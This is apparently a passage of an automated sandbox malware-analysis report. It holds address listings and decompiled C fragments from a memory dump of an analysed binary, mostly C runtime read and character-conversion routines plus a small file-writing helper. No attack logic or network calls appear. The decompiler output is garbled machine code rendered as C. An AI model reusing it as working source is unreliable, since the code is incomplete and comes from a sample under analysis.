                                                                                                    0x0040ed6b
                                                                                                    0x0040ed6d
                                                                                                    0x0040ed72
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040ed80
                                                                                                    0x0040ed83
                                                                                                    0x0040ed8a
                                                                                                    0x0040ed91
                                                                                                    0x0040ed95
                                                                                                    0x0040ed9b
                                                                                                    0x0040ed9d
                                                                                                    0x0040ed9d
                                                                                                    0x0040eda0
                                                                                                    0x0040eda0
                                                                                                    0x0040eda2
                                                                                                    0x0040eda3
                                                                                                    0x0040eda7
                                                                                                    0x0040eda9
                                                                                                    0x0040eda9
                                                                                                    0x0040edab
                                                                                                    0x0040edae
                                                                                                    0x0040edb3
                                                                                                    0x0040edba
                                                                                                    0x0040edbf
                                                                                                    0x0040ee58
                                                                                                    0x0040ee5b
                                                                                                    0x0040ee60
                                                                                                    0x0040ee60
                                                                                                    0x0040ee65
                                                                                                    0x0040ee6a
                                                                                                    0x0040ee6c
                                                                                                    0x0040ee73
                                                                                                    0x0040ee7a
                                                                                                    0x0040ee81
                                                                                                    0x0040ee9c
                                                                                                    0x0040ee9e
                                                                                                    0x0040ee83
                                                                                                    0x0040ee86
                                                                                                    0x0040ee87
                                                                                                    0x0040ee8f
                                                                                                    0x0040ee94
                                                                                                    0x0040ee94
                                                                                                    0x0040ee87
                                                                                                    0x0040eea8
                                                                                                    0x0040eeae
                                                                                                    0x0040eeb1
                                                                                                    0x0040eeb8
                                                                                                    0x0040eebf
                                                                                                    0x0040eebf
                                                                                                    0x00000000
                                                                                                    0x0040ee6a
                                                                                                    0x0040edc5
                                                                                                    0x0040edc7
                                                                                                    0x0040edcc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040edd2
                                                                                                    0x0040ede3
                                                                                                    0x0040ede8
                                                                                                    0x0040eded
                                                                                                    0x0040eded
                                                                                                    0x0040edf7
                                                                                                    0x0040edfa
                                                                                                    0x0040edff
                                                                                                    0x0040ee05
                                                                                                    0x0040ee0c
                                                                                                    0x0040ee13
                                                                                                    0x0040ee1a
                                                                                                    0x0040ee31
                                                                                                    0x0040ee33
                                                                                                    0x0040ee1c
                                                                                                    0x0040ee1f
                                                                                                    0x0040ee20
                                                                                                    0x0040ee25
                                                                                                    0x0040ee2a
                                                                                                    0x0040ee2a
                                                                                                    0x0040ee20
                                                                                                    0x0040ee3c
                                                                                                    0x0040ee42
                                                                                                    0x0040ee45
                                                                                                    0x0040ee4c
                                                                                                    0x0040ee53
                                                                                                    0x0040ee53
                                                                                                    0x00000000
                                                                                                    0x0040edff
                                                                                                    0x0040ed97
                                                                                                    0x00000000
                                                                                                    0x0040eec3
                                                                                                    0x0040eec3
                                                                                                    0x0040eec7
                                                                                                    0x0040eecf
                                                                                                    0x0040eed4
                                                                                                    0x0040eed9
                                                                                                    0x0040eed9
                                                                                                    0x0040eee3
                                                                                                    0x0040eee7
                                                                                                    0x0040eee8
                                                                                                    0x0040eeea
                                                                                                    0x0040eeef
                                                                                                    0x0040eef1
                                                                                                    0x0040eef4
                                                                                                    0x00000000
                                                                                                    0x0040ed80
                                                                                                    0x0040ed05
                                                                                                    0x0040ed09
                                                                                                    0x0040ed3b
                                                                                                    0x0040ed3c
                                                                                                    0x0040ed41
                                                                                                    0x00000000
                                                                                                    0x0040ed0b
                                                                                                    0x0040ed10
                                                                                                    0x0040ed14
                                                                                                    0x0040ed18
                                                                                                    0x0040ed1d
                                                                                                    0x0040ed1d
                                                                                                    0x0040ed20
                                                                                                    0x0040ed27
                                                                                                    0x0040ed2e
                                                                                                    0x0040ed31
                                                                                                    0x0040ed34
                                                                                                    0x0040ed38
                                                                                                    0x00000000
                                                                                                    0x0040ed38

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memmove_strtok
                                                                                                    • String ID:
                                                                                                    • API String ID: 3446180046-0
                                                                                                    • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                    • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                                    • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                                    • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 72%
                                                                                                    			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                    				char* _v8;
                                                                                                    				signed int _v12;
                                                                                                    				signed int _v16;
                                                                                                    				signed int _v20;
                                                                                                    				void* __ebx;
                                                                                                    				void* __esi;
                                                                                                    				signed int _t74;
                                                                                                    				char _t81;
                                                                                                    				signed int _t86;
                                                                                                    				signed int _t88;
                                                                                                    				signed int _t91;
                                                                                                    				signed int _t94;
                                                                                                    				signed int _t97;
                                                                                                    				signed int _t98;
                                                                                                    				char* _t99;
                                                                                                    				signed int _t100;
                                                                                                    				signed int _t102;
                                                                                                    				signed int _t103;
                                                                                                    				signed int _t104;
                                                                                                    				char* _t110;
                                                                                                    				signed int _t113;
                                                                                                    				signed int _t117;
                                                                                                    				signed int _t119;
                                                                                                    				void* _t120;
                                                                                                    
                                                                                                    				_t99 = _a4;
                                                                                                    				_t74 = _a8;
                                                                                                    				_v8 = _t99;
                                                                                                    				_v12 = _t74;
                                                                                                    				if(_a12 == 0) {
                                                                                                    					L5:
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    				_t97 = _a16;
                                                                                                    				if(_t97 == 0) {
                                                                                                    					goto L5;
                                                                                                    				}
                                                                                                    				_t124 = _t99;
                                                                                                    				if(_t99 != 0) {
                                                                                                    					_t119 = _a20;
                                                                                                    					__eflags = _t119;
                                                                                                    					if(_t119 == 0) {
                                                                                                    						L9:
                                                                                                    						__eflags = _a8 - 0xffffffff;
                                                                                                    						if(_a8 != 0xffffffff) {
                                                                                                    							_t74 = E0042B420(_t99, 0, _a8);
                                                                                                    							_t120 = _t120 + 0xc;
                                                                                                    						}
                                                                                                    						__eflags = _t119;
                                                                                                    						if(__eflags == 0) {
                                                                                                    							goto L3;
                                                                                                    						} else {
                                                                                                    							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
                                                                                                    							if(__eflags > 0) {
                                                                                                    								goto L3;
                                                                                                    							}
                                                                                                    							L13:
                                                                                                    							_t117 = _a12 * _t97;
                                                                                                    							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                                                                    							_t98 = _t117;
                                                                                                    							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                                                                    								_t100 = 0x1000;
                                                                                                    							} else {
                                                                                                    								_t100 =  *(_t119 + 0x18);
                                                                                                    							}
                                                                                                    							_v16 = _t100;
                                                                                                    							__eflags = _t117;
                                                                                                    							if(_t117 == 0) {
                                                                                                    								L41:
                                                                                                    								return _a16;
                                                                                                    							} else {
                                                                                                    								do {
                                                                                                    									__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                                                                    									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
                                                                                                    										L24:
                                                                                                    										__eflags = _t98 - _t100;
                                                                                                    										if(_t98 < _t100) {
                                                                                                    											_t81 = E0042B2F2(_t98, _t119, _t119);
                                                                                                    											__eflags = _t81 - 0xffffffff;
                                                                                                    											if(_t81 == 0xffffffff) {
                                                                                                    												L46:
                                                                                                    												return (_t117 - _t98) / _a12;
                                                                                                    											}
                                                                                                    											_t102 = _v12;
                                                                                                    											__eflags = _t102;
                                                                                                    											if(_t102 == 0) {
                                                                                                    												L42:
                                                                                                    												__eflags = _a8 - 0xffffffff;
                                                                                                    												if(__eflags != 0) {
                                                                                                    													E0042B420(_a4, 0, _a8);
                                                                                                    												}
                                                                                                    												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
                                                                                                    												L4:
                                                                                                    												E004242D2();
                                                                                                    												goto L5;
                                                                                                    											}
                                                                                                    											_t110 = _v8;
                                                                                                    											 *_t110 = _t81;
                                                                                                    											_t98 = _t98 - 1;
                                                                                                    											_v8 = _t110 + 1;
                                                                                                    											_t103 = _t102 - 1;
                                                                                                    											__eflags = _t103;
                                                                                                    											_v12 = _t103;
                                                                                                    											_t100 =  *(_t119 + 0x18);
                                                                                                    											_v16 = _t100;
                                                                                                    											goto L40;
                                                                                                    										}
                                                                                                    										__eflags = _t100;
                                                                                                    										if(_t100 == 0) {
                                                                                                    											_t86 = 0x7fffffff;
                                                                                                    											__eflags = _t98 - 0x7fffffff;
                                                                                                    											if(_t98 <= 0x7fffffff) {
                                                                                                    												_t86 = _t98;
                                                                                                    											}
                                                                                                    										} else {
                                                                                                    											__eflags = _t98 - 0x7fffffff;
                                                                                                    											if(_t98 <= 0x7fffffff) {
                                                                                                    												_t44 = _t98 % _t100;
                                                                                                    												__eflags = _t44;
                                                                                                    												_t113 = _t44;
                                                                                                    												_t91 = _t98;
                                                                                                    											} else {
                                                                                                    												_t113 = 0x7fffffff % _t100;
                                                                                                    												_t91 = 0x7fffffff;
                                                                                                    											}
                                                                                                    											_t86 = _t91 - _t113;
                                                                                                    										}
                                                                                                    										__eflags = _t86 - _v12;
                                                                                                    										if(_t86 > _v12) {
                                                                                                    											goto L42;
                                                                                                    										} else {
                                                                                                    											_push(_t86);
                                                                                                    											_push(_v8);
                                                                                                    											_push(E0042816B(_t119));
                                                                                                    											_t88 = E0042B5C4();
                                                                                                    											_t120 = _t120 + 0xc;
                                                                                                    											__eflags = _t88;
                                                                                                    											if(_t88 == 0) {
                                                                                                    												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
                                                                                                    												goto L46;
                                                                                                    											}
                                                                                                    											__eflags = _t88 - 0xffffffff;
                                                                                                    											if(_t88 == 0xffffffff) {
                                                                                                    												L45:
                                                                                                    												_t64 = _t119 + 0xc;
                                                                                                    												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
                                                                                                    												__eflags =  *_t64;
                                                                                                    												goto L46;
                                                                                                    											}
                                                                                                    											_t98 = _t98 - _t88;
                                                                                                    											__eflags = _t98;
                                                                                                    											L36:
                                                                                                    											_v8 = _v8 + _t88;
                                                                                                    											_v12 = _v12 - _t88;
                                                                                                    											_t100 = _v16;
                                                                                                    											goto L40;
                                                                                                    										}
                                                                                                    									}
                                                                                                    									_t94 =  *(_t119 + 4);
                                                                                                    									_v20 = _t94;
                                                                                                    									__eflags = _t94;
                                                                                                    									if(__eflags == 0) {
                                                                                                    										goto L24;
                                                                                                    									}
                                                                                                    									if(__eflags < 0) {
                                                                                                    										goto L45;
                                                                                                    									}
                                                                                                    									__eflags = _t98 - _t94;
                                                                                                    									if(_t98 < _t94) {
                                                                                                    										_t94 = _t98;
                                                                                                    										_v20 = _t98;
                                                                                                    									}
                                                                                                    									_t104 = _v12;
                                                                                                    									__eflags = _t94 - _t104;
                                                                                                    									if(_t94 > _t104) {
                                                                                                    										goto L42;
                                                                                                    									} else {
                                                                                                    										E00429544(_v8, _t104,  *_t119, _t94);
                                                                                                    										_t88 = _v20;
                                                                                                    										_t120 = _t120 + 0x10;
                                                                                                    										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
                                                                                                    										_t98 = _t98 - _t88;
                                                                                                    										 *_t119 =  *_t119 + _t88;
                                                                                                    										goto L36;
                                                                                                    									}
                                                                                                    									L40:
                                                                                                    									__eflags = _t98;
                                                                                                    								} while (_t98 != 0);
                                                                                                    								goto L41;
                                                                                                    							}
                                                                                                    						}
                                                                                                    					}
                                                                                                    					_t74 = (_t74 | 0xffffffff) / _a12;
                                                                                                    					__eflags = _t97 - _t74;
                                                                                                    					if(_t97 <= _t74) {
                                                                                                    						goto L13;
                                                                                                    					}
                                                                                                    					goto L9;
                                                                                                    				}
                                                                                                    				L3:
                                                                                                    				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
                                                                                                    				goto L4;
                                                                                                    			}



























                                                                                                    0x0042213a
                                                                                                    0x0042213d
                                                                                                    0x00422143
                                                                                                    0x00422146
                                                                                                    0x00422149
                                                                                                    0x00422166
                                                                                                    0x00000000
                                                                                                    0x00422166
                                                                                                    0x0042214b
                                                                                                    0x00422150
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00422152
                                                                                                    0x00422154
                                                                                                    0x0042216f
                                                                                                    0x00422172
                                                                                                    0x00422174
                                                                                                    0x00422182
                                                                                                    0x00422182
                                                                                                    0x00422186
                                                                                                    0x0042218e
                                                                                                    0x00422193
                                                                                                    0x00422193
                                                                                                    0x00422196
                                                                                                    0x00422198
                                                                                                    0x00000000
                                                                                                    0x0042219a
                                                                                                    0x004221a2
                                                                                                    0x004221a4
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004221a6
                                                                                                    0x004221a9
                                                                                                    0x004221ac
                                                                                                    0x004221b3
                                                                                                    0x004221b5
                                                                                                    0x004221bc
                                                                                                    0x004221b7
                                                                                                    0x004221b7
                                                                                                    0x004221b7
                                                                                                    0x004221c1
                                                                                                    0x004221c4
                                                                                                    0x004221c6
                                                                                                    0x004222af
                                                                                                    0x00000000
                                                                                                    0x004221cc
                                                                                                    0x004221cc
                                                                                                    0x004221cc
                                                                                                    0x004221d3
                                                                                                    0x00422214
                                                                                                    0x00422214
                                                                                                    0x00422216
                                                                                                    0x00422281
                                                                                                    0x00422287
                                                                                                    0x0042228a
                                                                                                    0x004222e1
                                                                                                    0x00000000
                                                                                                    0x004222e7
                                                                                                    0x0042228c
                                                                                                    0x0042228f
                                                                                                    0x00422291
                                                                                                    0x004222b7
                                                                                                    0x004222b7
                                                                                                    0x004222bb
                                                                                                    0x004222c5
                                                                                                    0x004222ca
                                                                                                    0x004222d2
                                                                                                    0x00422161
                                                                                                    0x00422161
                                                                                                    0x00000000
                                                                                                    0x00422161
                                                                                                    0x00422293
                                                                                                    0x00422296
                                                                                                    0x00422299
                                                                                                    0x0042229a
                                                                                                    0x0042229d
                                                                                                    0x0042229d
                                                                                                    0x0042229e
                                                                                                    0x004222a1
                                                                                                    0x004222a4
                                                                                                    0x00000000
                                                                                                    0x004222a4
                                                                                                    0x00422218
                                                                                                    0x0042221a
                                                                                                    0x0042223e
                                                                                                    0x00422243
                                                                                                    0x00422249
                                                                                                    0x0042224b
                                                                                                    0x0042224b
                                                                                                    0x0042221c
                                                                                                    0x0042221e
                                                                                                    0x00422224
                                                                                                    0x00422236
                                                                                                    0x00422236
                                                                                                    0x00422236
                                                                                                    0x00422238
                                                                                                    0x00422226
                                                                                                    0x0042222b
                                                                                                    0x0042222d
                                                                                                    0x0042222d
                                                                                                    0x0042223a
                                                                                                    0x0042223a
                                                                                                    0x0042224d
                                                                                                    0x00422250
                                                                                                    0x00000000
                                                                                                    0x00422252
                                                                                                    0x00422252
                                                                                                    0x00422253
                                                                                                    0x0042225d
                                                                                                    0x0042225e
                                                                                                    0x00422263
                                                                                                    0x00422266
                                                                                                    0x00422268
                                                                                                    0x004222ef
                                                                                                    0x00000000
                                                                                                    0x004222ef
                                                                                                    0x0042226e
                                                                                                    0x00422271
                                                                                                    0x004222dd
                                                                                                    0x004222dd
                                                                                                    0x004222dd
                                                                                                    0x004222dd
                                                                                                    0x00000000
                                                                                                    0x004222dd
                                                                                                    0x00422273
                                                                                                    0x00422273
                                                                                                    0x00422275
                                                                                                    0x00422275
                                                                                                    0x00422278
                                                                                                    0x0042227b
                                                                                                    0x00000000
                                                                                                    0x0042227b
                                                                                                    0x00422250
                                                                                                    0x004221d5
                                                                                                    0x004221d8
                                                                                                    0x004221db
                                                                                                    0x004221dd
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004221df
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004221e5
                                                                                                    0x004221e7
                                                                                                    0x004221e9
                                                                                                    0x004221eb
                                                                                                    0x004221eb
                                                                                                    0x004221ee
                                                                                                    0x004221f1
                                                                                                    0x004221f3
                                                                                                    0x00000000
                                                                                                    0x004221f9
                                                                                                    0x00422200
                                                                                                    0x00422205
                                                                                                    0x00422208
                                                                                                    0x0042220b
                                                                                                    0x0042220e
                                                                                                    0x00422210
                                                                                                    0x00000000
                                                                                                    0x00422210
                                                                                                    0x004222a7
                                                                                                    0x004222a7
                                                                                                    0x004222a7
                                                                                                    0x00000000
                                                                                                    0x004221cc
                                                                                                    0x004221c6
                                                                                                    0x00422198
                                                                                                    0x0042217b
                                                                                                    0x0042217e
                                                                                                    0x00422180
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00422180
                                                                                                    0x00422156
                                                                                                    0x0042215b
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                    • String ID:
                                                                                                    • API String ID: 2974526305-0
                                                                                                    • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                    • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                                    • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                                    • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                    				char _v8;
                                                                                                    				intOrPtr _v12;
                                                                                                    				int _v20;
                                                                                                    				int _t35;
                                                                                                    				int _t38;
                                                                                                    				intOrPtr* _t44;
                                                                                                    				int _t47;
                                                                                                    				short* _t49;
                                                                                                    				intOrPtr _t50;
                                                                                                    				intOrPtr _t54;
                                                                                                    				int _t55;
                                                                                                    				int _t59;
                                                                                                    				char* _t62;
                                                                                                    
                                                                                                    				_t62 = _a8;
                                                                                                    				if(_t62 == 0) {
                                                                                                    					L5:
                                                                                                    					return 0;
                                                                                                    				}
                                                                                                    				_t50 = _a12;
                                                                                                    				if(_t50 == 0) {
                                                                                                    					goto L5;
                                                                                                    				}
                                                                                                    				if( *_t62 != 0) {
                                                                                                    					E0042019C( &_v20, _a16);
                                                                                                    					_t35 = _v20;
                                                                                                    					__eflags =  *(_t35 + 0xa8);
                                                                                                    					if( *(_t35 + 0xa8) != 0) {
                                                                                                    						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
                                                                                                    						__eflags = _t38;
                                                                                                    						if(_t38 == 0) {
                                                                                                    							__eflags = _a4;
                                                                                                    							_t59 = 1;
                                                                                                    							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                    							if(__eflags != 0) {
                                                                                                    								L21:
                                                                                                    								__eflags = _v8;
                                                                                                    								if(_v8 != 0) {
                                                                                                    									_t54 = _v12;
                                                                                                    									_t31 = _t54 + 0x70;
                                                                                                    									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                    									__eflags =  *_t31;
                                                                                                    								}
                                                                                                    								return _t59;
                                                                                                    							}
                                                                                                    							L20:
                                                                                                    							_t44 = E00425208(__eflags);
                                                                                                    							_t59 = _t59 | 0xffffffff;
                                                                                                    							__eflags = _t59;
                                                                                                    							 *_t44 = 0x2a;
                                                                                                    							goto L21;
                                                                                                    						}
                                                                                                    						_t59 = _v20;
                                                                                                    						__eflags =  *(_t59 + 0x74) - 1;
                                                                                                    						if( *(_t59 + 0x74) <= 1) {
                                                                                                    							L15:
                                                                                                    							__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                    							L16:
                                                                                                    							if(__eflags < 0) {
                                                                                                    								goto L20;
                                                                                                    							}
                                                                                                    							__eflags = _t62[1];
                                                                                                    							if(__eflags == 0) {
                                                                                                    								goto L20;
                                                                                                    							}
                                                                                                    							L18:
                                                                                                    							_t59 =  *(_t59 + 0x74);
                                                                                                    							goto L21;
                                                                                                    						}
                                                                                                    						__eflags = _t50 -  *(_t59 + 0x74);
                                                                                                    						if(__eflags < 0) {
                                                                                                    							goto L16;
                                                                                                    						}
                                                                                                    						__eflags = _a4;
                                                                                                    						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                                                                    						_t59 = _v20;
                                                                                                    						__eflags = _t47;
                                                                                                    						if(_t47 != 0) {
                                                                                                    							goto L18;
                                                                                                    						}
                                                                                                    						goto L15;
                                                                                                    					}
                                                                                                    					_t55 = _a4;
                                                                                                    					__eflags = _t55;
                                                                                                    					if(_t55 != 0) {
                                                                                                    						 *_t55 =  *_t62 & 0x000000ff;
                                                                                                    					}
                                                                                                    					_t59 = 1;
                                                                                                    					goto L21;
                                                                                                    				}
                                                                                                    				_t49 = _a4;
                                                                                                    				if(_t49 != 0) {
                                                                                                    					 *_t49 = 0;
                                                                                                    				}
                                                                                                    				goto L5;
                                                                                                    			}
















                                                                                                    0x0043c67f
                                                                                                    0x0043c684
                                                                                                    0x0043c69e
                                                                                                    0x00000000
                                                                                                    0x0043c69e
                                                                                                    0x0043c686
                                                                                                    0x0043c68b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043c690
                                                                                                    0x0043c6ad
                                                                                                    0x0043c6b2
                                                                                                    0x0043c6b5
                                                                                                    0x0043c6bc
                                                                                                    0x0043c6db
                                                                                                    0x0043c6e2
                                                                                                    0x0043c6e4
                                                                                                    0x0043c728
                                                                                                    0x0043c737
                                                                                                    0x0043c745
                                                                                                    0x0043c747
                                                                                                    0x0043c757
                                                                                                    0x0043c757
                                                                                                    0x0043c75b
                                                                                                    0x0043c75d
                                                                                                    0x0043c760
                                                                                                    0x0043c760
                                                                                                    0x0043c760
                                                                                                    0x0043c760
                                                                                                    0x00000000
                                                                                                    0x0043c766
                                                                                                    0x0043c749
                                                                                                    0x0043c749
                                                                                                    0x0043c74e
                                                                                                    0x0043c74e
                                                                                                    0x0043c751
                                                                                                    0x00000000
                                                                                                    0x0043c751
                                                                                                    0x0043c6e6
                                                                                                    0x0043c6e9
                                                                                                    0x0043c6ed
                                                                                                    0x0043c716
                                                                                                    0x0043c716
                                                                                                    0x0043c719
                                                                                                    0x0043c719
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043c71b
                                                                                                    0x0043c71f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043c721
                                                                                                    0x0043c721
                                                                                                    0x00000000
                                                                                                    0x0043c721
                                                                                                    0x0043c6ef
                                                                                                    0x0043c6f2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043c6f6
                                                                                                    0x0043c709
                                                                                                    0x0043c70f
                                                                                                    0x0043c712
                                                                                                    0x0043c714
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0043c714
                                                                                                    0x0043c6be
                                                                                                    0x0043c6c1
                                                                                                    0x0043c6c3
                                                                                                    0x0043c6c8
                                                                                                    0x0043c6c8
                                                                                                    0x0043c6cd
                                                                                                    0x00000000
                                                                                                    0x0043c6cd
                                                                                                    0x0043c692
                                                                                                    0x0043c697
                                                                                                    0x0043c69b
                                                                                                    0x0043c69b
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                    • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.651464956.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.651464956.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_9721.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                    • String ID:
                                                                                                    • API String ID: 3058430110-0
                                                                                                    • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                    • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                                    • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                                    • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    C-Code - Quality: 67%
                                                                                                    			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
                                                                                                    				struct _OVERLAPPED* _v8;
                                                                                                    				intOrPtr _v16;
                                                                                                    				char _v17;
                                                                                                    				long _v24;
                                                                                                    				intOrPtr _v28;
                                                                                                    				char _v48;
                                                                                                    				void* __ebx;
                                                                                                    				void* __edi;
                                                                                                    				void* __esi;
                                                                                                    				void* __ebp;
                                                                                                    				int _t23;
                                                                                                    				intOrPtr _t25;
                                                                                                    				void* _t31;
                                                                                                    				intOrPtr* _t35;
                                                                                                    				signed int _t37;
                                                                                                    				short* _t40;
                                                                                                    				void* _t43;
                                                                                                    				intOrPtr* _t46;
                                                                                                    				CHAR* _t49;
                                                                                                    				intOrPtr _t50;
                                                                                                    				void* _t51;
                                                                                                    				short* _t53;
                                                                                                    
                                                                                                    				_push(0xffffffff);
                                                                                                    				_push(0x4caa48);
                                                                                                    				_push( *[fs:0x0]);
                                                                                                    				 *[fs:0x0] = _t50;
                                                                                                    				_t51 = _t50 - 0x20;
                                                                                                    				_push(_t31);
                                                                                                    				_t46 = __ecx;
                                                                                                    				_v8 = 0;
                                                                                                    				_t22 =  >=  ? _a4 :  &_a4;
                                                                                                    				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
                                                                                                    				_t43 = _t23;
                                                                                                    				if(_t43 == 0xffffffff) {
                                                                                                    					L8:
                                                                                                    					if(_a24 >= 8) {
                                                                                                    						_t23 = L00422587(_a4);
                                                                                                    					}
                                                                                                    					 *[fs:0x0] = _v16;
                                                                                                    					return _t23;
                                                                                                    				}
                                                                                                    				_t53 = _t51 - 0x18;
                                                                                                    				_v17 = 0;
                                                                                                    				_t40 = _t53;
                                                                                                    				 *((intOrPtr*)(_t40 + 0x14)) = 7;
                                                                                                    				 *(_t40 + 0x10) = 0;
                                                                                                    				 *_t40 = 0;
                                                                                                    				if( *_t46 != 0) {
                                                                                                    					_t35 = _t46;
                                                                                                    					_t31 = _t35 + 2;
                                                                                                    					do {
                                                                                                    						_t25 =  *_t35;
                                                                                                    						_t35 = _t35 + 2;
                                                                                                    					} while (_t25 != 0);
                                                                                                    					_t37 = _t35 - _t31 >> 1;
                                                                                                    					L6:
                                                                                                    					_push(_t37);
                                                                                                    					E00415C10(_t31, _t40, _t43, _t46, _t46);
                                                                                                    					E00412840( &_v48, _v17);
                                                                                                    					_t51 = _t53 + 0x18;
                                                                                                    					_t49 =  >=  ? _v48 :  &_v48;
                                                                                                    					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
                                                                                                    					_t23 = CloseHandle(_t43);
                                                                                                    					if(_v28 >= 0x10) {
                                                                                                    						_t23 = L00422587(_v48);
                                                                                                    						_t51 = _t51 + 4;
                                                                                                    					}
                                                                                                    					goto L8;
                                                                                                    				}
                                                                                                    				_t37 = 0;
                                                                                                    				goto L6;
                                                                                                    			}

























                                                                                                    0x0040f0e3
                                                                                                    0x0040f0e5
                                                                                                    0x0040f0f0
                                                                                                    0x0040f0f1
                                                                                                    0x0040f0f8
                                                                                                    0x0040f0fb
                                                                                                    0x0040f0fe
                                                                                                    0x0040f10b
                                                                                                    0x0040f11b
                                                                                                    0x0040f125
                                                                                                    0x0040f12b
                                                                                                    0x0040f130
